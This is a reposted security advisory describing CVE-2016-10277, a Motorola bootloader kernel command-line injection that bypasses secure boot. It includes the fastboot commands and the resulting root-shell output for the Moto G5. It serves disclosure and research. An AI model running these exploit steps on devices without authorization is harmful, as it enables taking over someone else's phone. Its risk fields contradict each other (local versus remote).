Motorola Bootloader Kernel Cmdline Injection Secure Boot and Device Locking Bypass

2017.09.02
Credit: Roee Hay
Risk: Medium
Local: Yes
Remote: No
CWE: N/A


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

initroot: Motorola Bootloader Kernel Cmdline Injection Secure Boot & Device Locking Bypass (CVE-2016-10277) By Roee Hay / Aleph Research, HCL Technologies Recap of the Vulnerability and the Tethered-jailbreak 1. Vulnerable versions of the Motorola Android Bootloader (ABOOT) allow for kernel command-line injection. 2. Using a proprietary fastboot OEM command, only available in the Motorola ABOOT, we can inject, through USB, a parameter named initrd which allows us to force the Linux kernel to populate initramfs into rootfs from a specified physical address. 3. We can abuse the ABOOT download functionality in order to place our own malicious initramfs at a known physical address, named SCRATCH_ADDR (see here for a list of devices). 4. Exploiting the vulnerability allows the adversary to gain unconfined root shell. 5. Since the initramfs payload is injected into RAM by the adversary, the vulnerability must be re-exploited on every reboot. For example, here is a successful run of the exploit on cedric (Moto G5) $ fastboot oem config fsg-id "a initrd=0xA2100000,1588598" $ fastboot flash aleph initroot-cedric.cpio.gz $ fastboot continue $ adb shell cedric:/ # id uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0 cedric:/ # getenforce Permissive cedric:/ #

References:

https://alephsecurity.com/2017/08/30/untethered-initroot/
https://github.com/alephsecurity/initroot


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top